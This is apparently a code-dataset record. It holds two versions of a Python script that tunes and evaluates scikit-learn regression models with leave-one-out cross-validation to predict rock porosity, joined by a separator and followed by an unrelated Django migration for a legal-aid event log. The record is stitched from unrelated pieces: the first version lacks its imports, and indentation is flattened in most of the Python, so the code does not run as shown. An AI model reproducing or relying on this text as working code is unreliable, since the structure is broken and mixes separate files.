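# Note: with n_split == len(X), KFold degenerates to leave-one-out cross validation,
# so every test fold holds exactly one sample. The check below is only a cheap sanity
# sketch and does not affect training.
assert all(len(test_idx) == 1 for _, test_idx in getKfoldIndexes())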
def evaluate_model(model, model_name, save_results=False):
'''
Evaluates the model using LOOCV and creates a file with the results.
Parameters:
model (sklearn.model): Sklearn model
model_name (int): Name of the algorithm
save_results (bool): save results to a file
Returns:
scores (DataFrame): Results of LOOCV
'''
# Setup directory to save results
# Creates the directory to save the results
pathToSaveModelEval = None
pathToSaveModelsDump = None
if save_results:
pathToSaveModelEval = f'../results/modelTrained/{model_name}'
pathToSaveModelsDump = pathToSaveModelEval+'/trainedModels'
Path(pathToSaveModelsDump).mkdir(parents=True, exist_ok=True)
scores = cross_validate(model,
X,
y=np.ravel(Y),
cv=getKfoldIndexes(),
scoring={'mse': 'neg_mean_squared_error'},
return_estimator=True)
yArray, yHatArray = computes_YHat(
scores, pathToSaveModelsDump, model_name=model_name)
predNPArray = np.concatenate((yArray, yHatArray),
axis=1)
dfColumnsExport = ['Y', 'YHat']
predDf = pd.DataFrame(predNPArray, columns=dfColumnsExport)
    if save_results:
        # only write the per-fold predictions when a results directory was created
        predDf.to_csv(f'{pathToSaveModelEval}/predictions.csv',
                      sep=';',
                      decimal='.',
                      index=False)
r2Result, mseResult, maeResult = compute_metrics(yArray, yHatArray)
textToPlot = f'{model_name}\n' \
f'R2: {r2Result:7.4f}\n' \
f'MSE: {mseResult:7.4f}\n' \
f'MAE: {maeResult:7.4f}'
scores['yHat'] = yHatArray
scores['y'] = yArray
scores['R2'] = r2Result
scores['MSE'] = mseResult
scores['MAE'] = maeResult
scores['modelName'] = model_name
print(textToPlot)
return scores
def computes_YHat(cv_scores,
path_to_save_models=None,
model_name=None):
'''
Uses all the estimators from LOOCV to make yHat estimations
Parameters:
cv_scores (DataFrame): The return from a cross validation
path_to_save_models (String): Path to save model dump
model_name (String): Name of the model
Returns:
y, y_hat (NumpyArray, NumpyArray): Ground Truth and Prediction
'''
resultList = cv_scores['estimator']
cross_val_indexes = getKfoldIndexes()
y_hat = []
y = []
# index of the for loop
i = 0
for est in resultList:
x_temp = cross_val_indexes[i][1]
if len(x_temp) > 0:
ground_truth = Y[x_temp]
x_temp = X[x_temp]
pred = est.predict(x_temp)
y_hat = y_hat + list(pred)
y = y + list(ground_truth.reshape(1, -1)[0])
            if path_to_save_models is not None:
                dump(
                    est, f'{path_to_save_models}/{model_name}_LOOCV_FOLD_{i}.joblib')
else:
print('Problem in estimation')
i = i + 1
y = mmY.inverse_transform(
np.asarray(y).reshape(-1, 1))
y_hat = mmY.inverse_transform(np.asarray(y_hat).reshape(-1, 1))
return y, y_hat
def compute_metrics(y_array, y_hat_array):
'''
Returns metrics for the estimations passed as arguments.
Parameters:
y_array (NumpyArray): Ground Truth
y_hat_array (NumpyArray): Model Estimations
Returns:
        (r2, mse, mae) (float, float, float): Metrics calculated
'''
mae = mean_absolute_error(y_array, y_hat_array)
r2 = r2_score(y_array, y_hat_array)
mse = mean_squared_error(y_array, y_hat_array)
return r2, mse, mae
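# Sanity sketch for compute_metrics (not part of the evaluation): a perfect prediction
# gives R2 = 1 and zero MSE/MAE. Note the return order is (r2, mse, mae).
_r2_chk, _mse_chk, _mae_chk = compute_metrics(np.array([[1.0], [2.0], [3.0]]),
                                              np.array([[1.0], [2.0], [3.0]]))
assert _r2_chk == 1.0 and _mse_chk == 0.0 and _mae_chk == 0.0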
def create_graphs(y_array, y_hat_array,
model_name, path_save_evaluation=None):
'''
Creates scatter and residual plot of predictions passed in the
first two parameters.
Parameters:
y_array (NumpyArray): Ground Truth value
y_hat_array (NumpyArray): Estimated Values
model_name (String): Name of the models
path_save_evaluation (String): Path to save graphs and
metrics
Returns:
None
'''
plt.clf()
plt.style.use(['seaborn-ticks'])
    plt.figure(figsize=(6.5, 4.1))
    # Plot the estimates
    plt.plot(y_array, y_hat_array, "o")
    # Plot a black identity line for comparison purposes
_, xmax = plt.xlim()
plt.plot([0, xmax], [0, xmax], 'k-')
y0, ymax = plt.ylim()
yDistanceY0_yMax = ymax - y0
# Plots a linear fit between prediction and actual value
linear = LinearRegression()
linear.fit(y_array, y_hat_array)
plt.plot(y_array, linear.predict(y_array), '-', color='red')
r2, mse, mae = compute_metrics(y_array, y_hat_array)
residual_array = y_array - y_hat_array
text_to_plot = f'R2: {r2:7.4f}\n' \
f'MSE: {mse:7.4f}\n' \
f'MAE: {mae:7.4f}'
print(text_to_plot)
plt.text(0, ymax - yDistanceY0_yMax * 0.2,
text_to_plot,
bbox=dict(facecolor='gray', alpha=0.5),
family='monospace')
# plt.title(modelName)
plt.grid(True)
plt.xlabel('Laboratory Determined Porosity [%]')
plt.ylabel(model_name+' Estimated Porosity [%]')
if path_save_evaluation:
# Save Graph
name_in_graph = model_name.split(' ')[0]
plt.savefig(f'{path_save_evaluation}/scatterPlot{name_in_graph}.png',
bbox_inches='tight', pad_inches=0.01)
# Save file metrics
with open(f'{path_save_evaluation}/metrics.txt',
mode='w') as f:
f.write(f'R2: {r2}\n')
f.write(f'MAE: {mae}\n')
f.write(f'MSE: {mse}\n')
f.write(f'Residuals: {residual_array}\n')
f.write(f'Y: {y_array}\n')
f.write(f'YHat: {y_hat_array}\n')
plt.show()
create_residual_plot(model_name, residual_array,
path_to_save=path_save_evaluation)
def create_residual_plot(model_name,
residual_list,
path_to_save=None):
'''
Creates the residual plot histogram.
Parameters:
model_name (String): Name of the model in the graph
residual_list (NumpyArray): Residuals of the estimation
path_to_save (String): Path to save the residuals graph
Returns:
None
'''
plt.clf()
sns.set(style="ticks")
_, (ax_box, ax_hist) = plt.subplots(2,
sharex=True,
gridspec_kw={
"height_ratios": (.15, .85)},
figsize=(6.5, 4.1))
ax_box.set_xlim((-15, 15))
ax_hist.set_xlim((-15, 15))
ax_hist.set_ylim((0, 13))
ax_hist.set_xlabel(f'{model_name} Porosity Estimation Residual')
ax_hist.set_ylabel('Frequency')
customBins = np.arange(-15.5, 15.5, 1)
ax_hist.set_yticks(np.arange(0, 14, 1))
ax_hist.set_xticks(np.arange(-15, 16, 3))
sns.boxplot(x=residual_list, ax=ax_box)
sns.histplot(data=residual_list,
bins=customBins,
kde=False, ax=ax_hist, legend=False, edgecolor="k", linewidth=1)
ax_box.set(yticks=[])
sns.despine(ax=ax_hist)
sns.despine(ax=ax_box, left=True)
if path_to_save is not None:
name_in_graph = model_name.split(' ')[0]
plt.savefig(f'{path_to_save}/residualsPlot{name_in_graph}.png',
bbox_inches='tight', pad_inches=0.01)
plt.show()
def grid_search_hyperparameters(grid_parameters, model_name, model, save_results=False):
'''
Does a 10 repetition 10-fold cross validation grid search to
select the best model in the parameter grid
Parameters:
grid_parameters (Dictionary): Grid parameters to use
in the model search
model_name (String): Name of the model in the graph
model (sklearn.model): Algorithm to use to train
the model
        save_results (bool): Save the grid search results to a file
Returns:
best_params (Dictionary): Best parameters
'''
cv = RepeatedKFold(
n_splits=10, n_repeats=10, random_state=0
)
gsCV = GridSearchCV(model,
grid_parameters,
cv=cv,
n_jobs=-1,
scoring='neg_mean_squared_error')
gsCV.fit(X, Y)
results_df = pd.DataFrame(gsCV.cv_results_)
results_df = results_df.sort_values(by=['rank_test_score'])
results_df = (
results_df
.set_index(results_df["params"].apply(
lambda x: "_".join(f'{key}:{val}' for key, val in x.items()))
)
.rename_axis('model')
)
print(results_df[
['rank_test_score', 'mean_test_score', 'std_test_score']
])
if save_results:
results_df.drop('params',
axis=1).to_csv(f'../results/modelTrained/{model_name}/GridSearchCV.csv',
decimal='.',
sep=';')
print(
f'Best {model_name}:\n Score > {gsCV.best_score_}\n Params > {gsCV.best_params_}')
return gsCV.best_params_
# Lasso
grid_parameters = {'alpha': [0.1, 0.01, 0.001, 0.0005, 0.00025, 0.0001, 0.00005],
'max_iter': [100, 1000, 10000, 100000]}
grid_search_hyperparameters(grid_parameters,
'Lasso Reg',
Lasso(),
save_results=True)
# Ridge
grid_parameters = {'alpha': [0.1, 0.01, 0.001, 0.0005, 0.00025, 0.0001, 0.00005],
'max_iter': [100, 1000, 10000, 100000]}
grid_search_hyperparameters(grid_parameters,
'Ridge Reg',
Ridge(),
save_results=True)
# ElasticNet
grid_parameters = {'alpha': [0.1, 0.01, 0.001, 0.0005, 0.00025, 0.0001, 0.00005],
'l1_ratio': [0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1],
'max_iter': [100, 1000, 10000, 100000]}
grid_search_hyperparameters(grid_parameters,
'ElasticNet',
ElasticNet(),
save_results=True)
# kNN
# rowvar=False: compute the covariance over the feature columns, as required by the
# Mahalanobis metric_params of KNeighborsRegressor
covParam = np.cov(X.astype(np.float32), rowvar=False)
invCovParam = np.linalg.pinv(covParam)
grid_parameters = [{'algorithm': ['auto'],
'metric': ['minkowski'],
'n_neighbors': [1, 2, 3, 4, 5]},
{'algorithm': ['brute'],
'metric': ['mahalanobis'],
'n_neighbors': [1, 2, 3, 4, 5],
'metric_params': [{'V': covParam,
'VI': invCovParam}]}]
grid_search_hyperparameters(grid_parameters,
'KNN',
KNeighborsRegressor(),
save_results=True)
# SVR Model
grid_parameters = {'C': [0.1, 1, 10, 100, 1000],
'gamma': ['auto', 5, 1, 0.1, 0.01, 0.001, 0.0001],
'kernel': ['rbf'],
'epsilon': [0.1, 0.01, 0.05]}
grid_search_hyperparameters(grid_parameters,
'SVR',
SVR(),
save_results=True)
# RF
grid_parameters = {'n_estimators': [10, 50, 100, 200, 500],
'criterion': ['mse', 'mae']}
grid_search_hyperparameters(grid_parameters,
'RF',
RandomForestRegressor(),
save_results=True)
# sorted(sklearn.metrics.SCORERS.keys())
# MLP
grid_parameters = {'hidden_layer_sizes': [(5, 5), (15, 10),
(20, 15, 10),
(20, 15, 15, 10),
(10, 5, 5, 5),
(20, 15, 10, 5)],
'activation': ['relu'],
'solver': ['adam'],
'max_iter': [1250, 1600, 2000, 2500, 3000],
'alpha': [0.01, 0.001, 0.0001],
'learning_rate': ['constant', 'adaptive'],
'batch_size': [1, 2, 3],
'learning_rate_init': [0.01, 0.001],
'early_stopping': [False]
}
grid_search_hyperparameters(grid_parameters,
'MLP',
MLPRegressor(),
save_results=True)
###################################
# Training and evaluation of models
# Linear Regression
linear = LinearRegression()
linearEval = evaluate_model(linear, 'Linear Reg', save_results=True)
# Ridge Regression
ridge = Ridge(alpha=0.1, max_iter=100)
ridgeEval = evaluate_model(ridge, 'Ridge Reg', save_results=True)
# Lasso Regression
lasso = Lasso(alpha=0.00025, max_iter=1000)
lassoEval = evaluate_model(lasso, 'Lasso Reg', save_results=True)
# ElasticNet
elasticNet = ElasticNet(alpha=0.00025, l1_ratio=1, max_iter=1000)
elasticNetEval = evaluate_model(elasticNet, 'ElasticNet', save_results=True)
'''
important_coeficients = []
coef = []
for est in elasticNetEval['estimator']:
vec = np.vectorize(lambda x: 0 if x == 0 else 1)
print(vec(est.coef_))
coef.append(est.coef_)
important_coeficients.append(vec(est.coef_))
important_coef_np = np.asfarray(important_coeficients)
coef = np.asarray(coef)
important_columns = vec(important_coef_np.sum(axis=0)).nonzero()[0]
teste = coef[:, important_columns]
plt.boxplot(teste[:, :])
plt.show()
dataset.columns[important_columns]
'''
# KNN Model Evaluation
knn = KNeighborsRegressor(n_neighbors=2,
metric='minkowski')
knnEval = evaluate_model(knn, 'KNN', save_results=True)
# SVR Model Evaluation
svr = SVR(gamma=5,
C=10,
epsilon=0.01,
kernel='rbf')
svrEval = evaluate_model(svr, 'SVR', save_results=True)
# Random Forest
forest = RandomForestRegressor(n_estimators=500,
criterion='mae')
forestEval = evaluate_model(forest, 'RF', save_results=True)
# MLP Model Evaluation
mlp = MLPRegressor(max_iter=3000,
hidden_layer_sizes=(20, 15, 15, 10),
activation='relu',
alpha=0.001,
learning_rate='adaptive',
learning_rate_init=0.001,
batch_size=3,
solver='adam')
mlpEval = evaluate_model(mlp, 'MLP', save_results=True)
# Compile all the predictions in the same CSV file
crossValIndexes = getKfoldIndexes()
crossValIndexes = list(map(lambda x: x[1][0], crossValIndexes))
wavelengthColumns = list(dataset.columns[:-1])
yHatTable = np.concatenate((X[crossValIndexes], linearEval['y'], linearEval['yHat'], ridgeEval['yHat'], lassoEval['yHat'],
                            elasticNetEval['yHat'], knnEval['yHat'], svrEval['yHat'], forestEval['yHat'], mlpEval['yHat']),
                           axis=1)
dfColumnsExport = wavelengthColumns + ['Y', 'Linear', 'Ridge', 'Lasso',
'ElasticNet', 'kNN', 'SVR', 'RF', 'MLP']
yHatDf = pd.DataFrame(yHatTable, columns=dfColumnsExport)
yHatDf.to_csv('../results/modelTrained/completePredictions.csv',
sep=';',
decimal='.',
index=False)
indexColumns = ['modelName', 'R2', 'MSE', 'MAE']
summaryDF = pd.DataFrame(
np.asarray(list(map(lambda x: list(map(lambda index: x[index], indexColumns)),
[linearEval, ridgeEval, lassoEval, elasticNetEval,
knnEval, svrEval, forestEval, mlpEval]))),
columns=indexColumns)
summaryDF.to_csv('../results/modelTrained/summary.csv',
sep=';',
decimal='.',
index=False)
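# Illustrative sketch (not called here): any fold model dumped during LOOCV can be
# reloaded with joblib for later inference; the path mirrors the dump() call in
# computes_YHat above.
def _example_reload_fold_model():
    reloaded = load('../results/modelTrained/SVR/trainedModels/SVR_LOOCV_FOLD_0.joblib')
    return reloaded.predict(X[:1])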
def plot_results():
models = ['Linear Reg', 'Lasso Reg', 'Ridge Reg',
'ElasticNet', 'KNN', 'SVR', 'RF', 'MLP']
for model_name in models:
path_model_data = f'../results/modelTrained/{model_name}'
path_prediction_file = f'{path_model_data}/predictions.csv'
df_prediction_data = pd.read_csv(
path_prediction_file, decimal='.', sep=';')
yArray = df_prediction_data['Y'].values.reshape(-1, 1)
yHatArray = df_prediction_data['YHat'].values.reshape(-1, 1)
create_graphs(yArray, yHatArray, model_name,
path_save_evaluation=path_model_data)
plot_results()
| import seaborn as sns
from pathlib import Path
import pandas as pd
import numpy as np
import copy
from scipy.stats import t
from sklearn.model_selection import RepeatedKFold
from sklearn.preprocessing import MinMaxScaler
from sklearn.ensemble import RandomForestRegressor
from sklearn.neighbors import KNeighborsRegressor
from sklearn.svm import SVR
from sklearn.neural_network import MLPRegressor
from sklearn.linear_model import LinearRegression, Ridge, Lasso, ElasticNet
from sklearn.metrics import mean_squared_error, r2_score, mean_absolute_error
from sklearn.model_selection import cross_validate, KFold, GridSearchCV
from joblib import dump, load
import matplotlib.pyplot as plt
import matplotlib as mpl
mpl.rcParams['figure.dpi'] = 400
# Import the data
dataset = pd.read_csv('../results/featureSelection/featureSelectedData.csv',
index_col=0)
X = dataset.values[:, :-1].astype(np.float64)
Y = dataset['Porosity (%)'].values.astype(np.float64)
mmY = MinMaxScaler()
Y = mmY.fit_transform(Y.reshape(-1, 1)).ravel()
# Auxiliary Functions
n_split = len(X)
kfold_indexes = list(KFold(n_split, shuffle=True).split(X))
def getKfoldIndexes():
return copy.deepcopy(kfold_indexes)
def evaluate_model(model, model_name, save_results=False):
'''
Evaluates the model using LOOCV and creates a file with the results.
Parameters:
model (sklearn.model): Sklearn model
model_name (int): Name of the algorithm
save_results (bool): save results to a file
Returns:
scores (DataFrame): Results of LOOCV
'''
# Setup directory to save results
# Creates the directory to save the results
pathToSaveModelEval = None
pathToSaveModelsDump = None
if save_results:
pathToSaveModelEval = f'../results/modelTrained/{model_name}'
pathToSaveModelsDump = pathToSaveModelEval+'/trainedModels'
Path(pathToSaveModelsDump).mkdir(parents=True, exist_ok=True)
scores = cross_validate(model,
X,
y=np.ravel(Y),
cv=getKfoldIndexes(),
scoring={'mse': 'neg_mean_squared_error'},
return_estimator=True)
yArray, yHatArray = computes_YHat(
scores, pathToSaveModelsDump, model_name=model_name)
predNPArray = np.concatenate((yArray, yHatArray),
axis=1)
dfColumnsExport = ['Y', 'YHat']
predDf = pd.DataFrame(predNPArray, columns=dfColumnsExport)
predDf.to_csv(f'{pathToSaveModelEval}/predictions.csv',
sep=';',
decimal='.',
index=False)
r2Result, mseResult, maeResult = compute_metrics(yArray, yHatArray)
textToPlot = f'{model_name}\n' \
f'R2: {r2Result:7.4f}\n' \
f'MSE: {mseResult:7.4f}\n' \
f'MAE: {maeResult:7.4f}'
scores['yHat'] = yHatArray
scores['y'] = yArray
scores['R2'] = r2Result
scores['MSE'] = mseResult
scores['MAE'] = maeResult
scores['modelName'] = model_name
print(textToPlot)
return scores
def computes_YHat(cv_scores,
path_to_save_models=None,
model_name=None):
'''
Uses all the estimators from LOOCV to make yHat estimations
Parameters:
cv_scores (DataFrame): The return from a cross validation
path_to_save_models (String): Path to save model dump
model_name (String): Name of the model
Returns:
y, y_hat (NumpyArray, NumpyArray): Ground Truth and Prediction
'''
resultList = cv_scores['estimator']
cross_val_indexes = getKfoldIndexes()
y_hat = []
y = []
# index of the for loop
i = 0
for est in resultList:
x_temp = cross_val_indexes[i][1]
if len(x_temp) > 0:
ground_truth = Y[x_temp]
x_temp = X[x_temp]
pred = est.predict(x_temp)
y_hat = y_hat + list(pred)
y = y + list(ground_truth.reshape(1, -1)[0])
dump(
est, f'{path_to_save_models}/{model_name}_LOOCV_FOLD_{i}.joblib')
else:
print('Problem in estimation')
i = i + 1
y = mmY.inverse_transform(
np.asarray(y).reshape(-1, 1))
y_hat = mmY.inverse_transform(np.asarray(y_hat).reshape(-1, 1))
return y, y_hat
def compute_metrics(y_array, y_hat_array):
'''
Returns metrics for the estimations passed as arguments.
Parameters:
y_array (NumpyArray): Ground Truth
y_hat_array (NumpyArray): Model Estimations
Returns:
(mae, r2, mse) (float, float, float): Metrics calculated
'''
mae = mean_absolute_error(y_array, y_hat_array)
r2 = r2_score(y_array, y_hat_array)
mse = mean_squared_error(y_array, y_hat_array)
return r2, mse, mae
def create_graphs(y_array, y_hat_array,
model_name, path_save_evaluation=None):
'''
Creates scatter and residual plot of predictions passed in the
first two parameters.
Parameters:
y_array (NumpyArray): Ground Truth value
y_hat_array (NumpyArray): Estimated Values
model_name (String): Name of the models
path_save_evaluation (String): Path to save graphs and
metrics
Returns:
None
'''
plt.clf()
plt.style.use(['seaborn-ticks'])
plt.figure(figsize=(6.5, 4.1)) # 4.75))
# Plots the estimatives
plt.plot(y_array, y_hat_array, "o")
# Plots a black line for comparation purpose
_, xmax = plt.xlim()
plt.plot([0, xmax], [0, xmax], 'k-')
y0, ymax = plt.ylim()
yDistanceY0_yMax = ymax - y0
# Plots a linear fit between prediction and actual value
linear = LinearRegression()
linear.fit(y_array, y_hat_array)
plt.plot(y_array, linear.predict(y_array), '-', color='red')
r2, mse, mae = compute_metrics(y_array, y_hat_array)
residual_array = y_array - y_hat_array
text_to_plot = f'R2: {r2:7.4f}\n' \
f'MSE: {mse:7.4f}\n' \
f'MAE: {mae:7.4f}'
print(text_to_plot)
plt.text(0, ymax - yDistanceY0_yMax * 0.2,
text_to_plot,
bbox=dict(facecolor='gray', alpha=0.5),
family='monospace')
# plt.title(modelName)
plt.grid(True)
plt.xlabel('Laboratory Determined Porosity [%]')
plt.ylabel(model_name+' Estimated Porosity [%]')
if path_save_evaluation:
# Save Graph
name_in_graph = model_name.split(' ')[0]
plt.savefig(f'{path_save_evaluation}/scatterPlot{name_in_graph}.png',
bbox_inches='tight', pad_inches=0.01)
# Save file metrics
with open(f'{path_save_evaluation}/metrics.txt',
mode='w') as f:
f.write(f'R2: {r2}\n')
f.write(f'MAE: {mae}\n')
f.write(f'MSE: {mse}\n')
f.write(f'Residuals: {residual_array}\n')
f.write(f'Y: {y_array}\n')
f.write(f'YHat: {y_hat_array}\n')
plt.show()
create_residual_plot(model_name, residual_array,
path_to_save=path_save_evaluation)
def create_residual_plot(model_name,
residual_list,
path_to_save=None):
'''
Creates the residual plot histogram.
Parameters:
model_name (String): Name of the model in the graph
residual_list (NumpyArray): Residuals of the estimation
path_to_save (String): Path to save the residuals graph
Returns:
None
'''
plt.clf()
sns.set(style="ticks")
_, (ax_box, ax_hist) = plt.subplots(2,
sharex=True,
gridspec_kw={
"height_ratios": (.15, .85)},
figsize=(6.5, 4.1))
ax_box.set_xlim((-15, 15))
ax_hist.set_xlim((-15, 15))
ax_hist.set_ylim((0, 13))
ax_hist.set_xlabel(f'{model_name} Porosity Estimation Residual')
ax_hist.set_ylabel('Frequency')
customBins = np.arange(-15.5, 15.5, 1)
ax_hist.set_yticks(np.arange(0, 14, 1))
ax_hist.set_xticks(np.arange(-15, 16, 3))
sns.boxplot(x=residual_list, ax=ax_box)
sns.histplot(data=residual_list,
bins=customBins,
kde=False, ax=ax_hist, legend=False, edgecolor="k", linewidth=1)
ax_box.set(yticks=[])
sns.despine(ax=ax_hist)
sns.despine(ax=ax_box, left=True)
if path_to_save is not None:
name_in_graph = model_name.split(' ')[0]
plt.savefig(f'{path_to_save}/residualsPlot{name_in_graph}.png',
bbox_inches='tight', pad_inches=0.01)
plt.show()
def grid_search_hyperparameters(grid_parameters, model_name, model, save_results=False):
'''
Does a 10 repetition 10-fold cross validation grid search to
select the best model in the parameter grid
Parameters:
grid_parameters (Dictionary): Grid parameters to use
in the model search
model_name (String): Name of the model in the graph
model (sklearn.model): Algorithm to use to train
the model
save_results (bool): Save LOOCV results to a file
Returns:
best_params (Dictionary): Best parameters
'''
cv = RepeatedKFold(
n_splits=10, n_repeats=10, random_state=0
)
gsCV = GridSearchCV(model,
grid_parameters,
cv=cv,
n_jobs=-1,
scoring='neg_mean_squared_error')
gsCV.fit(X, Y)
results_df = pd.DataFrame(gsCV.cv_results_)
results_df = results_df.sort_values(by=['rank_test_score'])
results_df = (
results_df
.set_index(results_df["params"].apply(
lambda x: "_".join(f'{key}:{val}' for key, val in x.items()))
)
.rename_axis('model')
)
print(results_df[
['rank_test_score', 'mean_test_score', 'std_test_score']
])
if save_results:
results_df.drop('params',
axis=1).to_csv(f'../results/modelTrained/{model_name}/GridSearchCV.csv',
decimal='.',
sep=';')
print(
f'Best {model_name}:\n Score > {gsCV.best_score_}\n Params > {gsCV.best_params_}')
return gsCV.best_params_
# Lasso
grid_parameters = {'alpha': [0.1, 0.01, 0.001, 0.0005, 0.00025, 0.0001, 0.00005],
'max_iter': [100, 1000, 10000, 100000]}
grid_search_hyperparameters(grid_parameters,
'Lasso Reg',
Lasso(),
save_results=True)
# Ridge
grid_parameters = {'alpha': [0.1, 0.01, 0.001, 0.0005, 0.00025, 0.0001, 0.00005],
'max_iter': [100, 1000, 10000, 100000]}
grid_search_hyperparameters(grid_parameters,
'Ridge Reg',
Ridge(),
save_results=True)
# ElasticNet
grid_parameters = {'alpha': [0.1, 0.01, 0.001, 0.0005, 0.00025, 0.0001, 0.00005],
'l1_ratio': [0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1],
'max_iter': [100, 1000, 10000, 100000]}
grid_search_hyperparameters(grid_parameters,
'ElasticNet',
ElasticNet(),
save_results=True)
# kNN
covParam = np.cov(X.astype(np.float32))
invCovParam = np.linalg.pinv(covParam)
grid_parameters = [{'algorithm': ['auto'],
'metric': ['minkowski'],
'n_neighbors': [1, 2, 3, 4, 5]},
{'algorithm': ['brute'],
'metric': ['mahalanobis'],
'n_neighbors': [1, 2, 3, 4, 5],
'metric_params': [{'V': covParam,
'VI': invCovParam}]}]
grid_search_hyperparameters(grid_parameters,
'KNN',
KNeighborsRegressor(),
save_results=True)
# SVR Model
grid_parameters = {'C': [0.1, 1, 10, 100, 1000],
'gamma': ['auto', 5, 1, 0.1, 0.01, 0.001, 0.0001],
'kernel': ['rbf'],
'epsilon': [0.1, 0.01, 0.05]}
grid_search_hyperparameters(grid_parameters,
'SVR',
SVR(),
save_results=True)
# RF
grid_parameters = {'n_estimators': [10, 50, 100, 200, 500],
'criterion': ['mse', 'mae']}
grid_search_hyperparameters(grid_parameters,
'RF',
RandomForestRegressor(),
save_results=True)
# sorted(sklearn.metrics.SCORERS.keys())
# MLP
grid_parameters = {'hidden_layer_sizes': [(5, 5), (15, 10),
(20, 15, 10),
(20, 15, 15, 10),
(10, 5, 5, 5),
(20, 15, 10, 5)],
'activation': ['relu'],
'solver': ['adam'],
'max_iter': [1250, 1600, 2000, 2500, 3000],
'alpha': [0.01, 0.001, 0.0001],
'learning_rate': ['constant', 'adaptive'],
'batch_size': [1, 2, 3],
'learning_rate_init': [0.01, 0.001],
'early_stopping': [False]
}
grid_search_hyperparameters(grid_parameters,
'MLP',
MLPRegressor(),
save_results=True)
###################################
# Training and evaluation of models
# Linear Regression
linear = LinearRegression()
linearEval = evaluate_model(linear, 'Linear Reg', save_results=True)
# Ridge Regression
ridge = Ridge(alpha=0.1, max_iter=100)
ridgeEval = evaluate_model(ridge, 'Ridge Reg', save_results=True)
# Lasso Regression
lasso = Lasso(alpha=0.00025, max_iter=1000)
lassoEval = evaluate_model(lasso, 'Lasso Reg', save_results=True)
# ElasticNet
elasticNet = ElasticNet(alpha=0.00025, l1_ratio=1, max_iter=1000)
elasticNetEval = evaluate_model(elasticNet, 'ElasticNet', save_results=True)
'''
important_coeficients = []
coef = []
for est in elasticNetEval['estimator']:
vec = np.vectorize(lambda x: 0 if x == 0 else 1)
print(vec(est.coef_))
coef.append(est.coef_)
important_coeficients.append(vec(est.coef_))
important_coef_np = np.asfarray(important_coeficients)
coef = np.asarray(coef)
important_columns = vec(important_coef_np.sum(axis=0)).nonzero()[0]
teste = coef[:, important_columns]
plt.boxplot(teste[:, :])
plt.show()
dataset.columns[important_columns]
'''
# KNN Model Evaluation
knn = KNeighborsRegressor(n_neighbors=2,
metric='minkowski')
knnEval = evaluate_model(knn, 'KNN', save_results=True)
# SVR Model Evaluation
svr = SVR(gamma=5,
C=10,
epsilon=0.01,
kernel='rbf')
svrEval = evaluate_model(svr, 'SVR', save_results=True)
# Random Forest
forest = RandomForestRegressor(n_estimators=500,
criterion='mae')
forestEval = evaluate_model(forest, 'RF', save_results=True)
# MLP Model Evaluation
mlp = MLPRegressor(max_iter=3000,
hidden_layer_sizes=(20, 15, 15, 10),
activation='relu',
alpha=0.001,
learning_rate='adaptive',
learning_rate_init=0.001,
batch_size=3,
solver='adam')
mlpEval = evaluate_model(mlp, 'MLP', save_results=True)
# Compile all the predictions in the same CSV file
crossValIndexes = getKfoldIndexes()
crossValIndexes = list(map(lambda x: x[1][0], crossValIndexes))
wavelengthColumns = list(dataset.columns[:-1])
yHatTable = np.concatenate((X[crossValIndexes], linearEval['y'], linearEval['yHat'], ridgeEval['yHat'], lassoEval['yHat'],
                            elasticNetEval['yHat'], knnEval['yHat'], svrEval['yHat'], forestEval['yHat'], mlpEval['yHat']),
axis=1)
dfColumnsExport = wavelengthColumns + ['Y', 'Linear', 'Ridge', 'Lasso',
'ElasticNet', 'kNN', 'SVR', 'RF', 'MLP']
yHatDf = pd.DataFrame(yHatTable, columns=dfColumnsExport)
yHatDf.to_csv('../results/modelTrained/completePredictions.csv',
sep=';',
decimal='.',
index=False)
indexColumns = ['modelName', 'R2', 'MSE', 'MAE']
summaryDF = pd.DataFrame(
np.asarray(list(map(lambda x: list(map(lambda index: x[index], indexColumns)),
[linearEval, ridgeEval, lassoEval, elasticNetEval,
knnEval, svrEval, forestEval, mlpEval]))),
columns=indexColumns)
summaryDF.to_csv('../results/modelTrained/summary.csv',
sep=';',
decimal='.',
index=False)
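# The exported tables can be read back with the same separators, e.g.
# (sketch, assuming the files above were written successfully):
#   summary = pd.read_csv('../results/modelTrained/summary.csv', sep=';', decimal='.')
#   predictions = pd.read_csv('../results/modelTrained/completePredictions.csv', sep=';', decimal='.')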
def plot_results():
models = ['Linear Reg', 'Lasso Reg', 'Ridge Reg',
'ElasticNet', 'KNN', 'SVR', 'RF', 'MLP']
for model_name in models:
path_model_data = f'../results/modelTrained/{model_name}'
path_prediction_file = f'{path_model_data}/predictions.csv'
df_prediction_data = pd.read_csv(
path_prediction_file, decimal='.', sep=';')
yArray = df_prediction_data['Y'].values.reshape(-1, 1)
yHatArray = df_prediction_data['YHat'].values.reshape(-1, 1)
create_graphs(yArray, yHatArray, model_name,
path_save_evaluation=path_model_data)
plot_results()
cla_backend/apps/cla_eventlog/migrations/0001_initial.py | uk-gov-mirror/ministryofjustice.cla_backend | 3 | 6632506 | <gh_stars>1-10
# coding=utf-8
from __future__ import unicode_literals
from django.conf import settings
from django.db import models, migrations
import django.utils.timezone
import jsonfield.fields
import model_utils.fields
class Migration(migrations.Migration):
dependencies = [
("legalaid", "0001_initial"),
("timer", "0001_initial"),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name="Log",
fields=[
("id", models.AutoField(verbose_name="ID", serialize=False, auto_created=True, primary_key=True)),
(
"created",
model_utils.fields.AutoCreatedField(
default=django.utils.timezone.now, verbose_name="created", editable=False
),
),
(
"modified",
model_utils.fields.AutoLastModifiedField(
default=django.utils.timezone.now, verbose_name="modified", editable=False
),
),
("code", models.CharField(max_length=50)),
("type", models.CharField(max_length=20, choices=[(b"outcome", b"outcome"), (b"system", b"system")])),
(
"level",
models.PositiveSmallIntegerField(choices=[(29, b"HIGH"), (21, b"MODERATE"), (11, b"MINOR")]),
),
("notes", models.TextField(null=True, blank=True)),
("patch", jsonfield.fields.JSONField(null=True, blank=True)),
(
"context",
jsonfield.fields.JSONField(
help_text=b"Field to store extra event data for reporting", null=True, blank=True
),
),
("case", models.ForeignKey(to="legalaid.Case")),
("created_by", models.ForeignKey(to=settings.AUTH_USER_MODEL)),
("timer", models.ForeignKey(blank=True, to="timer.Timer", null=True)),
],
options={"ordering": ("-created",)},
bases=(models.Model,),
)
]
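# Applying this initial migration follows the usual Django workflow (sketch;
# assumes the project's standard manage.py setup):
#   python manage.py migrate cla_eventlog 0001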
